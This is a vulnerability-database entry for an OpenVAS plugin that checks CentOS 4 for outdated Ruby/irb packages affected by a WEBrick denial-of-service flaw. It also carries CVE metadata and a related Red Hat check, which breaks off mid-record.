CentOS Update for irb CESA-2008:0981 centos4 x86_64
2009-02-27T00:00:00
ID OPENVAS:880192 Type openvas Reporter Copyright (C) 2009 Greenbone Networks GmbH Modified 2017-07-10T00:00:00
Description
Check for the Version of irb
###############################################################################
# OpenVAS Vulnerability Test
#
# CentOS Update for irb CESA-2008:0981 centos4 x86_64
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
tag_insight = "Ruby is an extensible, interpreted, object-oriented, scripting language. It
has features to process text files and to do system management tasks.
Vincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897
did not properly address a denial of service flaw in the WEBrick (Ruby
HTTP server toolkit), known as CVE-2008-3656. This flaw allowed a
remote attacker to send a specially-crafted HTTP request to a WEBrick
server that would cause the server to use excessive CPU time. This
update properly addresses this flaw. (CVE-2008-4310)
All Ruby users should upgrade to these updated packages, which contain a
correct patch that resolves this issue.";
tag_affected = "irb on CentOS 4";
tag_solution = "Please Install the Updated Packages.";
if(description)
{
script_xref(name : "URL" , value : "http://lists.centos.org/pipermail/centos-announce/2008-December/015515.html");
script_id(880192);
script_version("$Revision: 6651 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $");
script_tag(name:"creation_date", value:"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)");
script_tag(name:"cvss_base", value:"7.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
script_xref(name: "CESA", value: "2008:0981");
script_cve_id("CVE-2008-4310", "CVE-2008-3656");
script_name( "CentOS Update for irb CESA-2008:0981 centos4 x86_64");
script_summary("Check for the Version of irb");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
script_family("CentOS Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/centos", "ssh/login/rpms");
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "insight" , value : tag_insight);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("pkg-lib-rpm.inc");
release = get_kb_item("ssh/login/release");
res = "";
if(release == NULL){
exit(0);
}
if(release == "CentOS4")
{
if ((res = isrpmvuln(pkg:"irb", rpm:"irb~1.8.1~7.el4_7.2", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"ruby", rpm:"ruby~1.8.1~7.el4_7.2", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"ruby-devel", rpm:"ruby-devel~1.8.1~7.el4_7.2", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"ruby-docs", rpm:"ruby-docs~1.8.1~7.el4_7.2", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"ruby-libs", rpm:"ruby-libs~1.8.1~7.el4_7.2", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"ruby-mode", rpm:"ruby-mode~1.8.1~7.el4_7.2", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"ruby-tcltk", rpm:"ruby-tcltk~1.8.1~7.el4_7.2", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
{"id": "OPENVAS:880192", "type": "openvas", "bulletinFamily": "scanner", "title": "CentOS Update for irb CESA-2008:0981 centos4 x86_64", "description": "Check for the Version of irb", "published": "2009-02-27T00:00:00", "modified": "2017-07-10T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=880192", "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["2008:0981", "http://lists.centos.org/pipermail/centos-announce/2008-December/015515.html"], "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "lastseen": "2017-07-25T10:56:05", "viewCount": 1, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-07-25T10:56:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0981", "CVE-2008-3656", "CVE-2008-4310"]}, {"type": "openvas", "idList": ["OPENVAS:61774", "OPENVAS:61773", "OPENVAS:61451", "OPENVAS:1361412562310870122", "OPENVAS:1361412562310122539", "OPENVAS:1361412562310880192", "OPENVAS:870122", "OPENVAS:1361412562310880120", "OPENVAS:880120", "OPENVAS:61452"]}, {"type": "redhat", "idList": ["RHSA-2008:0897", "RHSA-2008:0981"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2008-0981.NASL", "FREEBSD_PKG_C329712A6B5B11DD9D79001FC61C2A55.NASL", "REDHAT-RHSA-2008-0897.NASL", "DEBIAN_DSA-1651.NASL", "ORACLELINUX_ELSA-2008-0897.NASL", "CENTOS_RHSA-2008-0897.NASL", "FREEBSD_PKG_F7BA20AA6B5A11DD9D79001FC61C2A55.NASL", "CENTOS_RHSA-2008-0981.NASL", "SL_20081204_RUBY_ON_SL4_X.NASL", "REDHAT-RHSA-2008-0981.NASL"]}, {"type": "centos", "idList": ["CESA-2008:0897", "CESA-2008:0981"]}, {"type": "exploitdb", "idList": ["EDB-ID:32222"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0897", "ELSA-2008-0981"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/HTTP/WEBRICK_REGEX"]}, {"type": "freebsd", "idList": ["C329712A-6B5B-11DD-9D79-001FC61C2A55", "F7BA20AA-6B5A-11DD-9D79-001FC61C2A55"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1652-1:B2D5C", "DEBIAN:DSA-1651-1:0FC77"]}, {"type": "ubuntu", "idList": ["USN-651-1"]}, {"type": "gentoo", "idList": ["GLSA-200812-17"]}, {"type": "suse", "idList": ["SUSE-SA:2009:037"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21825"]}], "modified": "2017-07-25T10:56:05", "rev": 2}, "vulnersScore": 6.9}, "pluginID": "880192", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0981 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n Vincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\n did not properly address a denial of service flaw in the WEBrick (Ruby\n HTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\n remote attacker to send a specially-crafted HTTP request to a WEBrick\n server that would cause the server to use excessive CPU time. This\n update properly addresses this flaw. (CVE-2008-4310)\n \n All Ruby users should upgrade to these updated packages, which contain a\n correct patch that resolves this issue.\";\n\ntag_affected = \"irb on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-December/015515.html\");\n script_id(880192);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0981\");\n script_cve_id(\"CVE-2008-4310\", \"CVE-2008-3656\");\n script_name( \"CentOS Update for irb CESA-2008:0981 centos4 x86_64\");\n\n script_summary(\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.2\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "CentOS Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T05:35:17", "description": "httputils.rb in WEBrick in Ruby 1.8.1 and 1.8.5, as used in Red Hat Enterprise Linux 4 and 5, allows remote attackers to cause a denial of service (CPU consumption) via a crafted HTTP request. NOTE: this issue exists because of an incomplete fix for CVE-2008-3656.", "edition": 4, "cvss3": {}, "published": "2008-12-09T00:30:00", "title": "CVE-2008-4310", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4310"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.8.1", "cpe:/a:ruby-lang:ruby:1.8.5"], "id": "CVE-2008-4310", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4310", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:15", "description": "Algorithmic complexity vulnerability in the WEBrick::HTTPUtils.split_header_value function in WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted HTTP request that is processed by a backtracking regular expression.", "edition": 6, "cvss3": {}, "published": "2008-08-13T01:41:00", "title": "CVE-2008-3656", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3656"], "modified": "2018-10-11T20:48:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.8.3", "cpe:/a:ruby-lang:ruby:1.8.4", "cpe:/a:ruby-lang:ruby:1.8.2", "cpe:/a:ruby-lang:ruby:1.8.1", "cpe:/a:ruby-lang:ruby:1.6.8", "cpe:/a:ruby-lang:ruby:1.9.0", "cpe:/a:ruby-lang:ruby:1.8.6", "cpe:/a:ruby-lang:ruby:1.8.5", "cpe:/a:ruby-lang:ruby:1.8.7", "cpe:/a:ruby-lang:ruby:1.8.0"], "id": "CVE-2008-3656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3656", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.8.6:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p71:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p114:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p11:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p17:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview5:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p22:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p12:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p113:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p35:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p110:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:p115:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.1:-9:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-27T10:56:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "description": "Check for the Version of ruby", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870122", "href": "http://plugins.openvas.org/nasl.php?oid=870122", "type": "openvas", "title": "RedHat Update for ruby RHSA-2008:0981-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0981-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n Vincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\n did not properly address a denial of service flaw in the WEBrick (Ruby\n HTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\n remote attacker to send a specially-crafted HTTP request to a WEBrick\n server that would cause the server to use excessive CPU time. This\n update properly addresses this flaw. (CVE-2008-4310)\n \n All Ruby users should upgrade to these updated packages, which contain a\n correct patch that resolves this issue.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4,\n Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-December/msg00000.html\");\n script_id(870122);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0981-02\");\n script_cve_id(\"CVE-2008-4310\", \"CVE-2008-3656\");\n script_name( \"RedHat Update for ruby RHSA-2008:0981-02\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.5~5.el5_2.6\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.2\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "description": "Check for the Version of ruby", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:1361412562310870122", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870122", "type": "openvas", "title": "RedHat Update for ruby RHSA-2008:0981-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0981-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n Vincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\n did not properly address a denial of service flaw in the WEBrick (Ruby\n HTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\n remote attacker to send a specially-crafted HTTP request to a WEBrick\n server that would cause the server to use excessive CPU time. This\n update properly addresses this flaw. (CVE-2008-4310)\n \n All Ruby users should upgrade to these updated packages, which contain a\n correct patch that resolves this issue.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4,\n Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-December/msg00000.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870122\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0981-02\");\n script_cve_id(\"CVE-2008-4310\", \"CVE-2008-3656\");\n script_name( \"RedHat Update for ruby RHSA-2008:0981-02\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", 